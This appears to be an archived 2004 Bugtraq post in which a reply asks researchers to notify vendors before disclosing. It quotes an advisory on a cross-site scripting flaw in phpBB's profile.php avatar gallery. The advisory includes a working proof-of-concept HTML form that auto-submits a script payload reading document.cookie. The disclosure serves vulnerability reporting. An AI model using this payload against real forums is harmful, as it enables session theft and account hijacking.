RE: Fw: phpBB profile.php Cross Site Scripting Vulnerability

micheal_at_michealcottingham.com
Date: 03/22/04

  • Next message: Janek Vind: "[waraxe-2004-SA#008 - easy way to get superadmin rights in PhpNuke 6.x-7.1.0]"
  • Next message: management_at_der-keiler.de: "Important notify"
    To: bugtraq@securityfocus.com
    Date: Mon, 22 Mar 2004 15:29:50 -0500
    
    

    I'm going to say this again. Please contact security@ before posting here,
    and give them an appropriate amount of time to reply. This goes for _any_
    software company. Thank you.

    ----- Original Message -----
    From: "Cheng Peng Su" <apple_soup@msn.com>
    To: <bugtraq@securityfocus.com>
    Sent: Saturday, March 20, 2004 10:36 PM
    Subject: phpBB profile.php Cross Site Scripting Vulnerability

    |
    |
    |
    | #####################################################################
    |
    | Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
    | Release Date : Mar 21,2004
    | Application : phpBB
    | Version : phpBB 2.0.6d or others?
    | Platform : PHP
    | Vendor URL : http://www.phpbb.com/
    | Author : Cheng Peng Su(apple_soup_at_msn.com)
    |
    | #####################################################################
    |
    | Proof of Conecpt:
    |
    | This vuln is in profile.php,when you click [Show Gallery],phpBB
    | will show you Avatar gallery,asking you to choose one for yourself.
    | The hole is in the form,after submitting phpBB will use the value of
    | "avatarselect" as the path of the gallery directly,without filtering
    | any illegal characters.
    |
    | Exploit:
    |
    | -------------exploit.htm--------------
    | <form name='f' action="http://site/profile.php?mode=editprofile"
    method="post">
    | <input name="avatarselect" value='"
    ><script>alert(document.cookie)</script>'>
    | <input type="submit" name="submitavatar" value="Select avatar">
    | </form>
    | <script>
    | window.onload=function()
    | {
    | document.all.submitavatar.click();
    | }
    | </script>
    | ---------------end-------------------
    |
    | Contact:
    |
    | Cheng Peng Su
    | Class 1,Senior 2,High school attached to Wuhan University
    | Wuhan,Hubei,China(430072)
    | apple_soup_at_msn.com
    |

    --------------------------------------------------------------------
    mail2web - Check your email from the web at
    http://mail2web.com/ .


  • Next message: Janek Vind: "[waraxe-2004-SA#008 - easy way to get superadmin rights in PhpNuke 6.x-7.1.0]"
  • Next message: management_at_der-keiler.de: "Important notify"

    Relevant Pages